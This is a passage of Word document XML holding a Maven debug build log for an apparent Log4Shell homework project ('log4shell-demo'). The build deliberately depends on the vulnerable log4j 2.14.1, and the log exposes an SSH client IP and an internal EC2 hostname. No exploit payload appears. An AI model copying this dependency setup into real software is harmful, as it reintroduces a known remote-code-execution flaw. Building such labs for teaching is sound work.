    <w:p w14:paraId="102C77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user.home=/home/ec2-user, postgresql.version=42.2.23, reactive-streams.version=1.0.3, env.DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus, jmustache.version=1.15, querydsl.version=4.4.0, appengine-sdk.version=1.9.91, thymeleaf-layout-dialect.version=2.5.3, hamcrest.version=2.2, os.version=6.1.134-152.225.amzn2023.x86_64, commons-pool.version=1.6, jakarta-jms.version=2.0.3, jakarta-transaction.version=1.3.3, env.MAIL=/var/spool/mail/ec2-user, java.vm.name=OpenJDK 64-Bit Server VM, maven-help-plugin.version=3.2.0, mimepull.version=1.9.15, json-path.version=2.5.0, jaxen.version=1.2.0, johnzon.version=1.2.14, os.arch=amd64, spring-batch.version=4.3.3, couchbase-client.version=3.1.7, derby.version=10.14.2.0, javax-jsonb.version=1.0, rxjava2.version=2.2.21, javax-jaxws.version=2.3.1, json-smart.version=2.4.7, javax-websocket.version=1.1, commons-codec.version=1.15, caffeine.version=2.9.2, h2.version=1.4.200, env.JAVA_HOME=/usr/lib/jvm/java-17, java.vm.compressedOopsMode=32-bit, pooled-jms.version=1.2.2, unboundid-ldapsdk.version=4.0.14, thymeleaf-extras-springsecurity.version=3.0.4.RELEASE, javax-jaxb.version=2.3.1, sqlite-jdbc.version=3.34.0, jakarta-servlet-jsp-jstl.version=1.2.7, activemq.version=5.16.3, httpasyncclient.version=4.1.4, jtds.version=1.3.1, javax-jms.version=2.0.1, jakarta-websocket.version=1.1.2, env.LOGNAME=ec2-user, spring-security.version=5.5.2, hibernate-validator.version=6.2.0.Final, assertj.version=3.19.0, jakarta-xml-soap.version=1.4.2, influxdb-java.version=2.21, httpcore5.version=5.1.1, lombok.version=1.18.20, maven.compiler.target=11, jakarta-xml-ws.version=2.3.3, env.S_COLORS=auto, library.jansi.path=/usr/share/maven/lib/jansi-native, env.XDG_SESSION_CLASS=user, commons-pool2.version=2.9.0, jackson-bom.version=2.12.5, env.VIRTUAL_ENV=/home/ec2-user/log4shell-homework/venv, spring-retry.version=1.3.1, maven-invoker-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>plugin.version=3.2.2, maven-antrun-plugin.version=1.8, maven.conf=/usr/share/maven/conf, sun.java.launcher=SUN_STANDARD, resource.delimiter=@, javax-json.version=1.1.4, jboss-logging.version=3.4.2.Final, maven-resources-plugin.version=3.2.0, javax-validation.version=2.0.1.Final, netty.version=4.1.68.Final, jetty-jsp.version=2.2.0.v201112011158, maven-source-plugin.version=3.2.1, jetty.version=9.4.43.v20210629, rxjava.version=1.3.8, elasticsearch.version=7.12.1, java.runtime.name=OpenJDK Runtime Environment, env.XDG_SESSION_ID=8, rest-assured.version=4.3.3, env.SYSTEMD_COLORS=false, maven-deploy-plugin.version=2.8.2, env.MAVEN_CMD_LINE_ARGS= spring-boot:run -X, log4j2.version=2.14.1, maven-failsafe-plugin.version=2.22.2, spring-framework.version=5.3.10, dropwizard-metrics.version=4.1.25, git-commit-id-plugin.version=4.0.5, kotlin-coroutines.version=1.5.2, hazelcast-hibernate5.version=2.2.1, htmlunit.version=2.49.1, env.TERM=xterm-256color, sun.arch.data.model=64, spring-restdocs.version=2.0.5.RELEASE, freemarker.version=2.3.31, thymeleaf.version=3.0.12.RELEASE, jakarta-json.version=1.1.6, janino.version=3.1.6, maven-jar-plugin.version=3.2.0, maven-compiler-plugin.version=3.8.1, java.specification.vendor=Oracle Corporation, rabbit-amqp-client.version=5.12.0, java.version.date=2025-04-15, spring-amqp.version=2.3.10, java.home=/usr/lib/jvm/java-17-amazon-corretto.x86_64, maven-war-plugin.version=3.3.2, jolokia.version=1.6.2, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, jetty-reactive-httpclient.version=1.1.10, env.PATH=/home/ec2-user/log4shell-homework/venv/bin:/home/ec2-user/.local/bin:/home/ec2-user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin, maven-dependency-plugin.version=3.1.2, httpclient.version=4.5.13, env.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:, jsonassert.version=1.5.0, file.encoding=UTF-8, gson.version=2.8.8, sun-mail.version=1.6.7, jakarta-annotation.version=1.3.5, env.HOSTNAME=ip-172-31-46-85.us-east-2.compute.internal, env.SHLVL=1, mssql-jdbc.version=9.2.1.jre8, snakeyaml.version=1.28, okhttp3.version=3.14.9, liquibase.version=4.3.5, httpcore.version=4.4.14, lettuce.version=6.1.5.RELEASE, classworlds.conf=/usr/share/maven/bin/m2.conf, sun.io.unicode.encoding=UnicodeLittle, kotlin.version=1.5.31, wsdl4j.version=1.6.3, tomcat.version=9.0.53, sendgrid.version=4.7.5, env.SSH_CLIENT=76.141.92.20 44903 22, glassfish-jaxb.version=2.3.5, spring-ws.version=3.1.1, commons-lang3.version=3.12.0, os.name=Linux, junit.version=4.13.2, jetty-el.version=9.0.52, env.SELINUX_USE_CURRENT_RANGE=, db2-jdbc.version=11.5.6.0, maven.build.timestamp=2025-05-29T00:36:41Z, env.SSH_CONNECTION=76.141.92.20 44903 172.31.46.85 22, reactor-bom.version=2020.0.11, maven-enforcer-plugin.version=3.0.0, jstl.version=1.2, quartz.version=2.3.2, javax-money.version=1.1, spring-hateoas.version=1.3.4, path.separator=:, env.SHELL=/bin/bash, jakarta-validation.version=2.0.2, env.HISTSIZE=1000, maven.multiModuleProjectDirectory=/home/ec2-user/log4shell-homework, oracle-database.version=21.1.0.0, env.MAVEN_PROJECTBASEDIR=/home/ec2-user/log4shell-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>homework, java.vm.info=mixed mode, sharing, cassandra-driver.version=4.11.3, env.USER=ec2-user, java.class.version=61.0, xml-maven-plugin.version=1.0.2, sun.jnu.encoding=UTF-8, xmlunit2.version=2.8.2, jakarta-mail.version=1.6.7, slf4j.version=1.7.32, r2dbc-bom.version=Arabba-SR10, solr.version=8.8.2, saaj-impl.version=1.5.3, nimbus-jose-jwt.version=9.10.1, maven.build.version=Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5), hikaricp.version=4.0.3, maven.home=/usr/share/maven, netty-tcnative.version=2.0.43.Final, maven-shade-plugin.version=3.2.4, sun.stderr.encoding=UTF-8, jakarta-json-bind.version=1.0.2, file.separator=/, line.separator=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE0A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sun.stdout.encoding=UTF-8, env.SSH_TTY=/dev/pts/0, spring-kafka.version=2.7.7, jersey.version=2.33, user.name=ec2-user, hazelcast.version=4.1.5, env.SELINUX_LEVEL_REQUESTED=, jdom2.version=2.0.6, atomikos.version=4.0.6, aspectj.version=1.9.7, hsqldb.version=2.5.2, ojdbc.version=19.3.0.0, env.XDG_RUNTIME_DIR=/run/user/1000, webjars-locator-core.version=0.46, project.reporting.outputEncoding=UTF-8, env.MOTD_SHOWN=pam, env.XDG_SESSION_TYPE=tty, oauth2-oidc-sdk.version=9.9.1, awaitility.version=4.0.3, env.OLDPWD=/home/ec2-user/log4shell-homework, env.PWD=/home/ec2-user/log4shell-homework, embedded-mongo.version=3.0.0, env.LESSOPEN=||/usr/bin/lesspipe.sh %s, spring-ldap.version=2.3.4.RELEASE, java.class.path=/usr/share/maven/boot/plexus-classworlds-2.6.0.jar, dependency-management-plugin.version=1.0.11.RELEASE, env.HOME=/home/ec2-user, java.vm.vendor=Amazon.com Inc., maven-javadoc-plugin.version=3.2.0, servlet-api.version=4.0.1, rsocket.version=1.1.1, jakarta-persistence.version=2.2.3, artemis.version=2.17.0, groovy.version=3.0.9, javax-cache.version=1.1.1, logback.version=1.2.6, prometheus-pushgateway.version=0.10.0, sun.cpu.endian=little, versions-maven-plugin.version=2.8.1, user.language=en, jedis.version=3.6.3, maven-clean-plugin.version=3.1.0, javax-mail.version=1.6.2, maven-surefire-plugin.version=2.22.2, javax-annotation.version=1.3.2, spring-data-bom.version=2021.0.5, mysql.version=8.0.26, classmate.version=1.5.1, jaybird.version=4.0.3.java8, antlr2.version=2.7.7, selenium.version=3.141.59, glassfish-el.version=3.0.4, project.build.sourceEncoding=UTF-8, jooq.version=3.14.15, java.vendor.url.bug=https://github.com/corretto/corretto-17/issues/, user.dir=/home/ec2-user/log4shell-homework, ehcache.version=2.10.9.2, junit-jupiter.version=5.7.2, java.vm.version=17.0.15+6-LTS, neo4j-java-driver.version=4.2.7, jakarta-activation.version=1.2.2, spring-session-bom.version=2021.0.2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E224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38461D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74D6DB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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4E5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directory /home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD6D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excludes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C767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includes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAB42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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CF0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no use filter components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194557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43F074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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51067E6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Configuring mojo org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B8F2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'org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EC5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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96F0A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buildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B68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compilePath = [/home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F44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compileSourceRoots = [/home/ec2-user/log4shell-homework/src/test/java]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C5C0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compilerId = javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75692C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debug = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF01F8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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF595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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A5AC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failOnWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28C76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forceJavacCompilerUse = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A75943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fork = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC453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generatedTestSourcesDirectory = /home/ec2-user/log4shell-homework/target/generated-test-sources/test-annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC0A0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mojoExecution = org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile {execution: default-testCompile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA9FFD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optimize = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C7DB2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outputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E51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parameters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAD8B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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125916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session = org.apache.maven.execution.MavenSession@3cd59ef5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFC8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showDeprecation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F70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showWarnings = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768952F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skipMultiThreadWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FF3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source = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6973B4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staleMillis = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB84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target = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E812E6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[DEBUG]   (f) testPath = [/home/ec2-user/log4shell-homework/target/test-classes, /home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD8E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useIncrementalCompilation = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA7B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verbose = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195258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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718A6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compiler 'javac'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B1708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4D35E1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27096C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&lt;&lt;&lt; spring-boot-maven-plugin:2.5.5:run (default-cli) &lt; test-compile @ log4shell-demo &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA488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561D3B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A8477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spring-boot-maven-plugin:2.5.5:run (default-cli) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7AE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Dependency collection stats {ConflictMarker.analyzeTime=185361, ConflictMarker.markTime=88370, ConflictMarker.nodeCount=231, ConflictIdSorter.graphTime=101531, ConflictIdSorter.topsortTime=49371, ConflictIdSorter.conflictIdCount=74, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=2118606, ConflictResolver.conflictItemCount=143, DefaultDependencyCollector.collectTime=264460099, DefaultDependencyCollector.transformTime=2588364}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01240C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org.springframework.boot:spring-boot-maven-plugin:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A9B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org.springframework.boot:spring-boot-buildpack-platform:jar:2.5.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35046D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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC8D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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79236B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com.fasterxml.jackson.core:jackson-core:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF92C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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3F35F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net.java.dev.jna:jna-platform:jar:5.7.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005EB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net.java.dev.jna:jna:jar:5.7.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2451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org.apache.commons:commons-compress:jar:1.20:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245D4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org.apache.httpcomponents:httpclient:jar:4.5.13:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9F7E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org.apache.httpcomponents:httpcore:jar:4.4.13:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D810D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commons-logging:commons-logging:jar:1.2:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109E8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commons-codec:commons-codec:jar:1.11:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643240B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org.springframework:spring-core:jar:5.3.10:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9DD8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org.springframework:spring-jcl:jar:5.3.10:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4B2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org.tomlj:tomlj:jar:1.0.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B106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org.antlr:antlr4-runtime:jar:4.7.2:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264556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com.google.code.findbugs:jsr305:jar:3.0.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D260A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org.springframework.boot:spring-boot-loader-tools:jar:2.5.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E5E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org.apache.maven.shared:maven-common-artifact-filters:jar:3.2.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F928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org.apache.maven:maven-artifact:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529E48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org.apache.maven:maven-model:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DCA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org.apache.maven:maven-core:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70ADF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org.apache.maven:maven-settings:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDB73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org.apache.maven:maven-settings-builder:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA89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org.apache.maven:maven-repository-metadata:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78042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org.apache.maven:maven-model-builder:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404329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org.apache.maven:maven-aether-provider:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9900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org.eclipse.aether:aether-spi:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF81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org.eclipse.aether:aether-impl:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F56E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org.codehaus.plexus:plexus-interpolation:jar:1.19:compile</w:t>
      </w:r>
    </w:p>
